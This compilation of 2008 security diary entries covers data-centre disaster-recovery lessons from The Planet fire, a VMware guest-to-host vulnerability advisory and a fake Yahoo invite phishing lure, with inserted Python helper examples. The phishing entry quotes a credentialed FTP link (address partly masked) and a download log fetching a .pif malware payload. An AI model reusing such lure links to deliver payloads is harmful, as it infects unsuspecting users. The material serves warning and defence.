  • Next I saw they were "requiring us to take down all generators as instructed by the fire department". I have seen BCP/DRP plans derail before because officials stepped in and handled the emergency their way rather than the way the organization itself had planned it.
    I think it would be interesting for most of us to actually talk to fire departments and/or police officers about what their normal responses are and take them into account in our plans. When you build a BCP you basically try to build (and spend money) on making sure you don't lose a site. One of those things you foresee is redundant power, but if you're not going to be allowed to use it, perhaps your priorities would shift to doing other things with your money and fixing it at another layer?
  • The reason they went down seems to have been: "electrical gear shorted, creating an explosion and fire that knocked down three walls surrounding our electrical equipment room". While it doesn't say as much, knocking down 3 walls is violent. Now an explosion can do that, and transformers indeed can explode, but there's another thing that can knock down walls: violently expanding gases from fire suppression systems; that's why you have those automatic vents in the walls. Please note: I'm not saying I know what happened, I don't. But there's one thing I'd do as a precaution: I'd like to make sure that my facilities processes include some regular check to see if those vents are still OK. Knocking over walls is just too much of a scary idea.
  • The Planet got vendors involved during the weekend itself: "As you know, we have vendors onsite at the H1 data center. With their help, we’ve created a list of equipment that will be required, and we’re already dealing with those manufacturers to find the gear. Since it’s Saturday night, we do have a few challenges".
    What have you foreseen so that, within hours of a fire/explosion, you have vendors helping you assess what equipment you need to get back on-line? Can you even reach them during a weekend? Every bit of time you put into collecting and updating this information up-front in your BCP/DRP will pay back many times in getting back on-line.
  • It's good to see they made a list of priorities public.
    Your plans could include such lists pre-made. It's easier to cross off items you still have than to think up the list yourself during the emergency.
  • There is talk from both The Planet and some of their customers about DNS and redundancy. I'm pretty sure it's not entirely The Planet's fault; customers putting all their eggs in one basket exist all too often.
    Still, I find this strange: DNS in my opinion is about the most redundant system you can get. You can easily add another server anywhere in the world, and there is hardly any penalty for not having all of them in the same spot. So why would you even consider having them in the same spot? Yet I've more than once seen setups where all the NS records entered in a TLD are on adjacent IP addresses, and when doing a traceroute they actually route exactly the same. This isn't using DNS for what it can do for you: it'll protect from a server outage, but not much more than that, while if you had a handful of DNS servers out there, you'd be next to impossible to get off the air DNS-wise.
  • The Planet is slowly getting back on the air, so that's good.
    I think it would be a good idea for a next BCP/DRP exercise to replay an existing incident and measure how you do against how they did in real life.
  • Lastly The Planet seems to be suffering from a /. effect on their forum. I think this is about the worst moment to get on slashdot you can imagine. But it's a likely result of the incident that those things you still have will attract more visitors than ever before.
    Again something to plan for ... although we here at the ISC had to go through a few /. features before we nailed it ourselves as well.
    Basically, make sure to have your emergency communication as solid as you can, as static as possible, and as lightweight on the server(s) as you can imagine. The last thing you want to do during an emergency is to have to survive a DDoS from curious people, like we all are ourselves.
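The DNS point above, turned into a check you can run against your own zone. This is an added example, not part of Swa's post: given the addresses of a zone's NS set (constructed sample data below, not real zones), group them by network prefix and flag a set whose servers all sit in one /24, the "adjacent IP addresses" pattern described.

```python
import ipaddress
from collections import defaultdict

# Constructed sample NS sets (not real zones): one with every server on
# adjacent addresses, one spread across unrelated prefixes.
SAMPLE_ZONES = {
    "single-site.example": {
        "ns1.single-site.example": "192.0.2.10",
        "ns2.single-site.example": "192.0.2.11",
        "ns3.single-site.example": "192.0.2.12",
    },
    "spread.example": {
        "ns1.spread.example": "192.0.2.10",
        "ns2.spread.example": "198.51.100.7",
        "ns3.spread.example": "203.0.113.200",
    },
}

def prefix_groups(ns_ips, prefix_len=24):
    """Group name servers by the prefix their address falls in (IPv4 uses
    prefix_len, IPv6 a /48). Servers sharing a prefix almost certainly
    share a site and upstream, so they go down together."""
    groups = defaultdict(list)
    for name, ip in ns_ips.items():
        addr = ipaddress.ip_address(ip)
        plen = prefix_len if addr.version == 4 else 48
        net = ipaddress.ip_network(f"{addr}/{plen}", strict=False)
        groups[str(net)].append(name)
    return dict(groups)

def assess_redundancy(ns_ips, prefix_len=24, min_sites=2):
    """Report how many distinct prefixes the NS set spans and whether that
    meets the minimum; the groups are returned for the report."""
    groups = prefix_groups(ns_ips, prefix_len)
    return {
        "servers": len(ns_ips),
        "distinct_prefixes": len(groups),
        "redundant": len(groups) >= min_sites,
        "groups": groups,
    }

if __name__ == "__main__":
    for zone, servers in SAMPLE_ZONES.items():
        r = assess_redundancy(servers)
        status = "OK" if r["redundant"] else "SINGLE POINT OF FAILURE"
        print(f"{zone}: {r['servers']} NS, {r['distinct_prefixes']} prefix(es) -> {status}")
```

A real run would feed in the A/AAAA records of the NS names as published by the TLD; a traceroute per server, as Swa suggests, catches the case where distinct prefixes still share one path.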

My best wishes to the folks at The Planet and glad to read nobody got hurt.

To the thousands of customers affected, well, there's the SLA, but there's also some pretty decent work in recovering going on. And I can only hope those companies where I host servers would be able to do equally well and be as open about it as these folks have been so far.

Swa Frantzen -- Gorilla Security


Published: 2008-06-01

Updates to VMware resolve critical security issues

I don't know how many of you work with VMware, but I have to thank Ed Skoudis for turning me on to virtualization in one of his classes long ago.  Since that time, I have been using it as an invaluable tool for incident handling and testing patches and vulnerabilities.  So, I found it interesting to see the VMware security advisory VMSA-2008-0008 sent from fellow handler Jim Clausing.  Security Focus is reporting that there are no exploits in the wild at this time.  These security vulnerabilities have been addressed in the newest releases of VMware's hosted product line.  The advisory affects the following products:

VMware Workstation 6.0.3 and earlier
VMware Player 2.0.3 and earlier
VMware ACE 2.0.3 and earlier
VMware Fusion 1.1.1 and earlier

Windows based VMCI arbitrary code execution vulnerability

VMware says that VMCI was introduced in VMware Workstation 6.0, VMware Player 2.0, and VMware ACE 2.0 and it is an experimental, optional feature that allows virtual machines to communicate with one another.  With VMCI enabled a guest may execute arbitrary code in the context of the vmx process on the host.  This is a compiler dependent vulnerability and only affects systems running on Windows hosts.  An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges.  Successfully exploiting this issue can completely compromise affected computers.  Failed exploit attempts will result in a denial-of-service condition.

VMware Host Guest File System (HGFS) shared folders

Secondly, this feature allows users to transfer data between a guest operating system and the non-virtualized host operating system that contains it.  The vulnerability is a heap buffer overflow.  Exploitation of this flaw might allow an unprivileged guest process to execute code in the context of the vmx process on the host.  In order to exploit this vulnerability, the VMware system must have at least one folder shared.  One good thing about this vulnerability is that if you are using the default setting, you are not vulnerable.  The vulnerability only applies if you have changed the settings to share folders.  VMware Server, ESX and ESXi do not provide the shared folders feature, so they are not vulnerable.
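The two preconditions above (VMCI enabled on a Windows host; at least one shared folder) are exactly what an inventory script should look for while the patches roll out. The following triage is an added example, not VMware's code: it assumes the .vmx keys vmci0.present and sharedFolderN.present are the right indicators for those two features (the advisory text names the features, not the keys), and it takes the affected version ceilings from the product list quoted in this diary.

```python
import re

# Last affected version per product, from VMSA-2008-0008 as quoted above.
AFFECTED_MAX = {"workstation": (6, 0, 3), "player": (2, 0, 3),
                "ace": (2, 0, 3), "fusion": (1, 1, 1)}

# Constructed sample .vmx (not a real VM). Using vmci0.present and
# sharedFolderN.present as the exposure indicators is this example's
# assumption; the advisory text above names the features, not the keys.
SAMPLE_VMX = """\
.encoding = "UTF-8"
config.version = "8"
vmci0.present = "TRUE"
sharedFolder.maxNum = "1"
sharedFolder0.present = "TRUE"
sharedFolder0.hostPath = "C:\\\\Users\\\\user\\\\share"
"""

def parse_vmx(text):
    """Parse key = "value" lines into a dict with lower-cased keys."""
    cfg = {}
    for line in text.splitlines():
        m = re.match(r'\s*([\w.:]+)\s*=\s*"?([^"]*)"?\s*$', line)
        if m:
            cfg[m.group(1).lower()] = m.group(2)
    return cfg

def is_true(cfg, key):
    return cfg.get(key, "").strip().lower() == "true"

def version_affected(product, version):
    """True when the product/version is at or below the affected ceiling."""
    nums = tuple(int(p) for p in version.split("."))
    return nums <= AFFECTED_MAX[product.lower()]

def triage(vmx_text, product, version, host_os):
    """Apply the advisory's two preconditions: VMCI only on Windows hosts
    with VMCI enabled, HGFS only when a shared folder is configured."""
    findings = []
    if not version_affected(product, version):
        return findings
    cfg = parse_vmx(vmx_text)
    if host_os.lower() == "windows" and is_true(cfg, "vmci0.present"):
        findings.append("VMCI enabled on Windows host: guest can run code as vmx")
    if any(k.startswith("sharedfolder") and k.endswith(".present")
           and is_true(cfg, k) for k in cfg):
        findings.append("HGFS shared folder configured: heap overflow exposure")
    return findings
```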

Fair Winds,
Mari Nichols


Published: 2008-06-01

Free Yahoo email account! Sign me up, Ok well maybe not.

Hello , !
Your friend invited you to use the BETA email Service from YAHOO join YAHOO and Create your Free Email Account

Just click here to receive your FREE YAHOO EMAIL Account!

OK, so it is just a small variation on the greeting card theme (although they haven’t bothered to change the file being downloaded).  The main difference is the message, and rather than using HTTP to deliver the file, the link is an FTP link along these lines: ftp://username:emanresu@82.bbb.ccc.ddd/private/postcard.pif

Connecting to 82 .bbb.ccc.ddd:21... connected.
Logging in as username ... Logged in!
==> SYST ... done.    ==> PWD ... done.
==> TYPE I ... done.  ==> CWD /private ... done.
==> PASV ... done.    ==> RETR postcard.pif ...

Corporate networks typically block outbound FTP, so most of you should be OK at work.  Home users, however, may end up with a little surprise.  The file downloaded should be reasonably well detected by most AV products.  The few sites I checked had already had the file pulled (or not yet placed there).
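The lure's giveaways are all in the link: FTP scheme, credentials embedded in the URL, and an executable file name. The mail-filter check below is an added example, not from Mark's diary; the messages are constructed, and the address keeps the diary's masked form with placeholder octets.

```python
import re
from urllib.parse import urlsplit

# Constructed sample message bodies (not real spam); the first mirrors the
# lure described above, the others are benign links that must not fire.
SAMPLE_MESSAGES = [
    "Just click here to receive your FREE YAHOO EMAIL Account! "
    "ftp://username:emanresu@82.bbb.ccc.ddd/private/postcard.pif",
    "Quarterly report attached, see http://intranet.example/reports/q2.pdf",
    "Mirror: ftp://ftp.example.org/pub/readme.txt",
]

URL_RE = re.compile(r"\b(?:ftp|https?)://[^\s<>\"']+", re.IGNORECASE)
EXEC_EXT = {".pif", ".exe", ".scr", ".com", ".bat", ".cmd"}

def classify_link(url):
    """Return the reasons a link looks like the lure: FTP scheme,
    credentials in the URL, executable file name."""
    u = urlsplit(url)
    reasons = []
    if u.scheme.lower() == "ftp":
        reasons.append("ftp scheme")
    if u.username is not None or u.password is not None:
        reasons.append("embedded credentials")
    name = u.path.rsplit("/", 1)[-1].lower()
    if any(name.endswith(ext) for ext in EXEC_EXT):
        reasons.append(f"executable payload {name}")
    return reasons

def scan_message(body, min_reasons=2):
    """Return (url, reasons) for suspicious links in a message body; a link
    needs at least min_reasons hits so plain FTP mirrors of text files pass."""
    hits = []
    for url in URL_RE.findall(body):
        reasons = classify_link(url)
        if len(reasons) >= min_reasons:
            hits.append((url, reasons))
    return hits
```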

It is a fairly trivial thing.  The only reason I mention it is that, like no doubt a fair number of you, I looked at it and thought “mmm, interesting that Yahoo is going down the invite path, just like Google” and opened the message to have a look.  So the message is reasonably effective at first glance.

From a broader perspective, there seems to be no lack of FTP servers connected to the internet that have been or are being compromised.   If you run an internet facing FTP server, when was the last time you checked the logs and the users defined?

Mark H - Shearwater